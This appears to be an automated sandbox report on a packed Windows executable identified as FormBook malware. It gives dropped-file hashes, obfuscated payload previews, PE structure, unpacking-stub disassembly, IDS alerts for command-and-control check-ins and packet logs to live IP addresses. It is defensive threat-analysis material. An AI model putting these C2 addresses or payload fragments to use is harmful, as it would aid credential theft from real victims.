	cKmmceC6UO.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.96.3
	w3xlXm0r8W.exe	Get hash	malicious	FormBook	Browse	104.21.79.53
	https://www.uploadhub.io/kZ6xQJLbaWK4vPM/file	Get hash	malicious	Unknown	Browse	188.114.97.3

Process:	C:\Windows\SysWOW64\msinfo32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Halitherses

Download File

Process:	C:\Users\user\Desktop\6ddrUd6iQo.exe
File Type:	data
Category:	dropped
Size (bytes):	287232
Entropy (8bit):	7.99341038356181
Encrypted:	true
SSDEEP:	6144:UKF/BS4wA1LJgv6BfZGZDSD/umi+rGIpu46T8EaiB:l9BxwA11fBqAWF3ag
MD5:	210C5A6ACBD676F894E6D669D856820B
SHA1:	39CDAE68900576BA94DDCC59663BE1AB7262F646
SHA-256:	A829325C325996BEFF73F8B1FF25F709E0F8B4EC86A41D98A8218CFA935BC903
SHA-512:	BCA37C61E78ACB45BBBD3A16683B8D168F2D543DD4C168D10F49A9E562328D2D287BD31396C821B78461AA34B49AD6457103297672AE39E797E96359860D51C6
Malicious:	false
Reputation:	low
Preview:	..u..40N2l..1....ZV....7A...MKFC0ZU40N24I08ZMKFC0ZU40N24I0.ZMKH\.TU.9...H\|.{.#/0.'[W<SYiSY4#$2cR?uFE .]'.\|..k+,T?{9=D.4I08ZMK?B9.hTW..T...:.\.oTW.(....:.\.iTW.`]X.:*.FC0ZU40NbqI0t[LK..0.U40N24I0.ZOJMB;ZUd4N24I08ZMK.W0ZU$0N2TM08Z.KFS0ZU60N44I08ZMK@C0ZU40N2TM08XMKFC0ZW4p.24Y08JMKFC ZU$0N24I0(ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKh7U"!40NV{M08JMKF.4ZU$0N24I08ZMKFC0Zu40.24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N

C:\Users\user\AppData\Local\Temp\aut207F.tmp

Download File

Process:	C:\Users\user\Desktop\6ddrUd6iQo.exe
File Type:	data
Category:	dropped
Size (bytes):	287232
Entropy (8bit):	7.99341038356181
Encrypted:	true
SSDEEP:	6144:UKF/BS4wA1LJgv6BfZGZDSD/umi+rGIpu46T8EaiB:l9BxwA11fBqAWF3ag
MD5:	210C5A6ACBD676F894E6D669D856820B
SHA1:	39CDAE68900576BA94DDCC59663BE1AB7262F646
SHA-256:	A829325C325996BEFF73F8B1FF25F709E0F8B4EC86A41D98A8218CFA935BC903
SHA-512:	BCA37C61E78ACB45BBBD3A16683B8D168F2D543DD4C168D10F49A9E562328D2D287BD31396C821B78461AA34B49AD6457103297672AE39E797E96359860D51C6
Malicious:	false
Reputation:	low
Preview:	..u..40N2l..1....ZV....7A...MKFC0ZU40N24I08ZMKFC0ZU40N24I0.ZMKH\.TU.9...H\|.{.#/0.'[W<SYiSY4#$2cR?uFE .]'.\|..k+,T?{9=D.4I08ZMK?B9.hTW..T...:.\.oTW.(....:.\.iTW.`]X.:*.FC0ZU40NbqI0t[LK..0.U40N24I0.ZOJMB;ZUd4N24I08ZMK.W0ZU$0N2TM08Z.KFS0ZU60N44I08ZMK@C0ZU40N2TM08XMKFC0ZW4p.24Y08JMKFC ZU$0N24I0(ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKh7U"!40NV{M08JMKF.4ZU$0N24I08ZMKFC0Zu40.24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N24I08ZMKFC0ZU40N

C:\Users\user\AppData\Local\Temp\aut20BF.tmp

Download File

Process:	C:\Users\user\Desktop\6ddrUd6iQo.exe
File Type:	data
Category:	dropped
Size (bytes):	12952
Entropy (8bit):	7.723584520843446
Encrypted:	false
SSDEEP:	384:YCFK5RhX3vDzNKK1IIlCjCxKqp7Uy4LvK:rFK5z/DUKSt+Uyyi
MD5:	D0BE8A50E5AF44B1F02113F135412B6A
SHA1:	665C6C28D4175531ECA5DBEEF4FE2C6AB47D73D6
SHA-256:	C469605EEA61F2D0D7E3D4448E05EC3DF135D10E3D77D1A8B5F6854A8C062AE0
SHA-512:	EFD48DCA73230BE574A1790A23D6A210B3A47622539B0B4D151C46D6462A374D2C62FCD56D2EB5F691085C6F4213C5397BD8F9027F74185D240ADC2A85327886
Malicious:	false
Preview:	EA06..p.......f.Ll.[5.a3.L....q;.Ng.Y..b..M....k9.Yg.i...1.NgS....<.X.s....0..'s..u;.N&.p.:g:.Ngsy...d.N...t.q9.Nf.i..b.Y...9..l.Y..h.....ac....4...k...k....kd....]..'V)....I...e.Y...7.Ol3I...K ...mf.....8.Y...U..d.N...:...V`...:...%.8.M.v......Y&.0.f.i.Xf.P.NO'3K ..h..&@...N,.....izsf.M..3c....99.M.....<\|.Y.....y..v......K`0.M..K..s6....h....&.<....M...z.9.O&. ..Y.+......-..<.M@x=h...`.^.Yl.0..q9...k8..&.y..s7...rwh.N@R.e.Z..q:..xfw;...vo9...fw9...v.8...f.9..Zr{5.L.p.8....:...<fz.e..v.u...N..#..m G^...rn.u.....7.:....S....@K...V'@)D......b.TN..d...\|v)...7...z.6...K;4.X.vi...@..h...I...c.K=.r......g.X...g.L..>....5.h.<;7....\.N@4.;...K..@4.....vP?..e.....6....-...c...\|3i..p....'.._..p....l.._......-..7... .@..5..l...yd.M......l.E...N..kE..d..ls+$.{e..v.G.n.). .i0.....,.y5..6.$Fq2.Y...D..<..-6..D.Y..,.`.F.9..f.K@..g.......sf....2....v.&*.8.N&.@.LM..K%..3.>.\.c..Q.~fS....n3K8.&'.I...c..'.8.. ....e1.x...4..2bl..Z.VI.. .....8.......,..:..S...k8..nno6..nrg5

C:\Users\user\AppData\Local\Temp\bankrupture

Download File

Process:	C:\Users\user\Desktop\6ddrUd6iQo.exe
File Type:	ASCII text, with very long lines (28674), with no line terminators
Category:	dropped
Size (bytes):	28674
Entropy (8bit):	4.440046499943809
Encrypted:	false
SSDEEP:	768:3B/xREgo0iee0eaPQjbyq4BD5xB3FG6Z9dVH+qyP3XdIav:Tugo0iegRCD5xq2zVH+q6XdIav
MD5:	58354547C42FCB2C14D298640D0E84F1
SHA1:	54A081A05E065871598A902ABCFCA81180F50670
SHA-256:	A3B41797DECE8D42A46A0DD27F0FA260C82722AE3925BF0AD130DE5712B8EFF1
SHA-512:	4310566AC52B8B3EE5BA0F8F6CE29E4F1C13078342B3CF86CF5917228AB2C594AEBB73969384D093ACE5FF57FEDABBD83269B25DFA4E13ABE487F1988C34072F
Malicious:	false
Preview:	1z898cgf<1fefg032340688;b98e40123467:<8596e=662340129:8:6g<6cc:601234078;=56:;f87g340123:69;798bd<:512340189<95f;gbb8f40123467:<959ge<342340129:8:68=0c;6601234078;=4e;5fa3g340123:69;8995d;:412340189<957<:b:8f40123467:<8d::ee6d2340129:8:78=a45f467:<85:ee=6f2340129:8::g84ghijfgdd;412340189<9:77:fghijfc:9801234078;=866;jfghijb:8f40123467:<<d5cijfghifa7e340123:69;<94dhijfghe<2f2340129:8::88eghijfgd<:412340189<99f84fghijfcc9g01234078;=9675jfghijb98f40123467:<<566ijfghi73d;9:8::g96ghijfgdd;512340189<967g4b99640123467:<85e4e=662340129:8:6gh4cc:601234078;=56f9f845340123:69;79d9d<7212340189<95fgebb4h40123467:<95eee<652340129:8:68hec;9g01234078;=4eg3fa7e340123:69;89e356g078;=46g7f973340123:69;;h69hijfghee652340129:8:;8:aghijfgd;;612340189<9979gfghijfc;9501234078;=8e8hjfghijbb9340123467:<=582ijfghif87;340123:69;;973hijfghe=342340129:8::g;4ghijfgdd7212340189<9:7::fghijfc:5i01234078;=869;jfghijb:8740123467:<<d8cijfghifa7e340123:69;<97dhijfghe<6d2340129:8::8;eghijfg56g978;=4e:3fa85340123:69;89a1d;:8

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):	7.959740922660546
TrID:	Win32 Executable (generic) a (10002005/4) 99.39% UPX compressed Win32 Executable (30571/9) 0.30% Win32 EXE Yoda's Crypter (26571/9) 0.26% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	6ddrUd6iQo.exe
File size:	731'136 bytes
MD5:	f00fb34d9a82c351b6d65f60e494c41c
SHA1:	2abfa0b1579544b6b9ed5e58971e5412943ee2da
SHA256:	ee18930ee603d14401820554e2d003eb06efc51ee4b90071b178f6da05ae067b
SHA512:	09a926bfcf521e2ac315d4211de93c9c6576d6cb07ee76927b6c97d98a810e78ba365a0567d2b48309c01d3cae3c5c69a55e81051b2f15c32804e09ce2625e26
SSDEEP:	12288:mYV6MorX7qzuC3QHO9FQVHPF51jgcBiNYqMZwDjkxfc+U/llLyVlT/ngYlI00kJ7:lBXu9HGaVHAN4IkxVU/7+T/ngYlI00kt
TLSH:	B5F423D0FB91EC7DC86607FAD8779425201ABC9D46B7034DA4CAF239B937B41985B883
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	3864e4063261150e

Static PE Info

General

Entrypoint:	0x534090
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66981371 [Wed Jul 17 18:54:41 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fc6683d30d9f25244a50fd5357825e79

Entrypoint Preview

Instruction
pushad
mov esi, 004DE000h
lea edi, dword ptr [esi-000DD000h]
push edi
jmp 00007F839927888Dh
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007F8399278889h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F839927886Fh
mov eax, 00000001h
add ebx, ebx
jne 00007F8399278889h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007F839927888Dh
jne 00007F83992788AAh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F83992788A1h
dec eax
add ebx, ebx
jne 00007F8399278889h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007F8399278856h
add ebx, ebx
jne 00007F8399278889h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007F83992788D4h
xor ecx, ecx
sub eax, 03h
jc 00007F8399278893h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007F83992788F7h
sar eax, 1
mov ebp, eax
jmp 00007F839927888Dh
add ebx, ebx
jne 00007F8399278889h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F839927884Eh
inc ecx
add ebx, ebx
jne 00007F8399278889h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F8399278840h
add ebx, ebx
jne 00007F8399278889h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007F8399278871h
jne 00007F839927888Bh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007F8399278866h
add ecx, 02h
cmp ebp, FFFFFB00h
adc ecx, 02h
lea edx, dword ptr [edi+ebp]
cmp ebp, FFFFFFFCh
jbe 00007F8399278890h
mov al, byte ptr [edx]

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x190b3c	0x424	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x135000	0x5bb3c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x190f60	0xc	.rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x134274	0x48	UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0xdd000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1	0xde000	0x57000	0x56400	618554285c5c3877d783c249a72535bd	False	0.9873216711956522	data	7.93543995089258	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x135000	0x5c000	0x5c000	5cb4f57169c3916ce34168b61bae7be8	False	0.9571957795516305	data	7.95118230024347	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x13545c	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0x135588	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0x1356b4	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0x1357e0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 0	English	Great Britain	0.16798535663675013
RT_MENU	0xcc9f8	0x50	empty	English	Great Britain	0
RT_STRING	0xcca48	0x594	empty	English	Great Britain	0
RT_STRING	0xccfdc	0x68a	empty	English	Great Britain	0
RT_STRING	0xcd668	0x490	empty	English	Great Britain	0
RT_STRING	0xcdaf8	0x5fc	empty	English	Great Britain	0
RT_STRING	0xce0f4	0x65c	empty	English	Great Britain	0
RT_STRING	0xce750	0x466	empty	English	Great Britain	0
RT_STRING	0xcebb8	0x158	empty	English	Great Britain	0
RT_RCDATA	0x139a0c	0x56bca	data			1.0003265085539612
RT_GROUP_ICON	0x1905dc	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x1905f4	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x19060c	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x190624	0x14	data	English	Great Britain	1.25
RT_VERSION	0x19063c	0x10c	data	English	Great Britain	0.5895522388059702
RT_MANIFEST	0x19074c	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
KERNEL32.DLL	LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll	GetAce
COMCTL32.dll	ImageList_Remove
COMDLG32.dll	GetOpenFileNameW
GDI32.dll	LineTo
IPHLPAPI.DLL	IcmpSendEcho
MPR.dll	WNetUseConnectionW
ole32.dll	CoGetObject
OLEAUT32.dll	VariantInit
PSAPI.DLL	GetProcessMemoryInfo
SHELL32.dll	DragFinish
USER32.dll	GetDC
USERENV.dll	LoadUserProfileW
UxTheme.dll	IsThemeActive
VERSION.dll	VerQueryValueW
WININET.dll	FtpOpenFileW
WINMM.dll	timeGetTime
WSOCK32.dll	connect

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-08-02T13:42:02.642634+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49744	80	192.168.2.4	162.254.38.5
2024-08-02T13:43:19.334182+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49762	80	192.168.2.4	162.241.75.234
2024-08-02T13:43:04.740010+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49759	80	192.168.2.4	103.42.108.46
2024-08-02T13:41:38.139970+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49739	80	192.168.2.4	188.114.96.3
2024-08-02T13:42:05.078384+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49745	80	192.168.2.4	162.254.38.5
2024-08-02T13:42:38.301795+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49752	80	192.168.2.4	66.235.200.145
2024-08-02T13:42:49.768237+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49755	80	192.168.2.4	162.241.148.243
2024-08-02T13:42:24.891934+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49748	80	192.168.2.4	103.71.177.176
2024-08-02T13:43:21.672615+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49763	80	192.168.2.4	162.241.75.234
2024-08-02T13:41:57.333748+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49742	80	192.168.2.4	162.254.38.5
2024-08-02T13:42:33.330127+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49750	80	192.168.2.4	66.235.200.145
2024-08-02T13:43:09.991405+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49761	80	192.168.2.4	103.42.108.46
2024-08-02T13:42:55.551567+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49757	80	192.168.2.4	162.241.148.243
2024-08-02T13:42:22.289603+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49747	80	192.168.2.4	103.71.177.176
2024-08-02T13:42:27.430805+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49749	80	192.168.2.4	103.71.177.176
2024-08-02T13:41:40.780194+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49740	80	192.168.2.4	188.114.96.3
2024-08-02T13:41:14.592427+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49737	80	192.168.2.4	85.159.66.93
2024-08-02T13:42:19.719719+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49746	80	192.168.2.4	103.71.177.176
2024-08-02T13:42:52.357367+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49756	80	192.168.2.4	162.241.148.243
2024-08-02T13:41:35.571147+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49738	80	192.168.2.4	188.114.96.3
2024-08-02T13:42:41.072990+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49753	80	192.168.2.4	66.235.200.145
2024-08-02T13:42:35.909012+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49751	80	192.168.2.4	66.235.200.145
2024-08-02T13:43:02.167722+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49758	80	192.168.2.4	103.42.108.46
2024-08-02T13:41:43.272155+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49741	80	192.168.2.4	188.114.96.3
2024-08-02T13:41:59.909829+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49743	80	192.168.2.4	162.254.38.5
2024-08-02T13:42:47.191324+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49754	80	192.168.2.4	162.241.148.243
2024-08-02T13:43:21.673188+0200	TCP	2012510	ET SHELLCODE UTF-8/16 Encoded Shellcode	80	49763	162.241.75.234	192.168.2.4
2024-08-02T13:43:07.305200+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49760	80	192.168.2.4	103.42.108.46

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2024 13:41:13.872239113 CEST	49737	80	192.168.2.4	85.159.66.93
Aug 2, 2024 13:41:13.877103090 CEST	80	49737	85.159.66.93	192.168.2.4
Aug 2, 2024 13:41:13.877222061 CEST	49737	80	192.168.2.4	85.159.66.93
Aug 2, 2024 13:41:13.899024963 CEST	49737	80	192.168.2.4	85.159.66.93
Aug 2, 2024 13:41:13.904731989 CEST	80	49737	85.159.66.93	192.168.2.4
Aug 2, 2024 13:41:14.592142105 CEST	80	49737	85.159.66.93	192.168.2.4
Aug 2, 2024 13:41:14.592344046 CEST	80	49737	85.159.66.93	192.168.2.4
Aug 2, 2024 13:41:14.592427015 CEST	49737	80	192.168.2.4	85.159.66.93
Aug 2, 2024 13:41:14.602600098 CEST	49737	80	192.168.2.4	85.159.66.93
Aug 2, 2024 13:41:14.607938051 CEST	80	49737	85.159.66.93	192.168.2.4
Aug 2, 2024 13:41:34.837372065 CEST	49738	80	192.168.2.4	188.114.96.3
Aug 2, 2024 13:41:34.842405081 CEST	80	49738	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:34.842583895 CEST	49738	80	192.168.2.4	188.114.96.3
Aug 2, 2024 13:41:34.865253925 CEST	49738	80	192.168.2.4	188.114.96.3
Aug 2, 2024 13:41:34.870237112 CEST	80	49738	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:35.570951939 CEST	80	49738	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:35.571068048 CEST	80	49738	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:35.571146965 CEST	49738	80	192.168.2.4	188.114.96.3
Aug 2, 2024 13:41:36.380558968 CEST	49738	80	192.168.2.4	188.114.96.3
Aug 2, 2024 13:41:37.416642904 CEST	49739	80	192.168.2.4	188.114.96.3
Aug 2, 2024 13:41:37.425770044 CEST	80	49739	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:37.425878048 CEST	49739	80	192.168.2.4	188.114.96.3
Aug 2, 2024 13:41:37.448318958 CEST	49739	80	192.168.2.4	188.114.96.3
Aug 2, 2024 13:41:37.453843117 CEST	80	49739	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:38.138837099 CEST	80	49739	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:38.139883995 CEST	80	49739	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:38.139970064 CEST	49739	80	192.168.2.4	188.114.96.3
Aug 2, 2024 13:41:38.958945036 CEST	49739	80	192.168.2.4	188.114.96.3
Aug 2, 2024 13:41:39.996536016 CEST	49740	80	192.168.2.4	188.114.96.3
Aug 2, 2024 13:41:40.001630068 CEST	80	49740	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:40.001715899 CEST	49740	80	192.168.2.4	188.114.96.3
Aug 2, 2024 13:41:40.024821043 CEST	49740	80	192.168.2.4	188.114.96.3
Aug 2, 2024 13:41:40.029720068 CEST	80	49740	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:40.029732943 CEST	80	49740	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:40.029746056 CEST	80	49740	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:40.029819965 CEST	80	49740	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:40.029831886 CEST	80	49740	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:40.029841900 CEST	80	49740	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:40.029854059 CEST	80	49740	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:40.029874086 CEST	80	49740	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:40.029884100 CEST	80	49740	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:40.779383898 CEST	80	49740	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:40.780044079 CEST	80	49740	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:40.780194044 CEST	49740	80	192.168.2.4	188.114.96.3
Aug 2, 2024 13:41:41.536958933 CEST	49740	80	192.168.2.4	188.114.96.3
Aug 2, 2024 13:41:42.573057890 CEST	49741	80	192.168.2.4	188.114.96.3
Aug 2, 2024 13:41:42.577997923 CEST	80	49741	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:42.578160048 CEST	49741	80	192.168.2.4	188.114.96.3
Aug 2, 2024 13:41:42.597862959 CEST	49741	80	192.168.2.4	188.114.96.3
Aug 2, 2024 13:41:42.605683088 CEST	80	49741	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:43.270644903 CEST	80	49741	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:43.272037983 CEST	80	49741	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:43.272155046 CEST	49741	80	192.168.2.4	188.114.96.3
Aug 2, 2024 13:41:43.280528069 CEST	49741	80	192.168.2.4	188.114.96.3
Aug 2, 2024 13:41:43.285554886 CEST	80	49741	188.114.96.3	192.168.2.4
Aug 2, 2024 13:41:56.695667982 CEST	49742	80	192.168.2.4	162.254.38.5
Aug 2, 2024 13:41:56.700891972 CEST	80	49742	162.254.38.5	192.168.2.4
Aug 2, 2024 13:41:56.701147079 CEST	49742	80	192.168.2.4	162.254.38.5
Aug 2, 2024 13:41:56.724178076 CEST	49742	80	192.168.2.4	162.254.38.5
Aug 2, 2024 13:41:56.729120016 CEST	80	49742	162.254.38.5	192.168.2.4
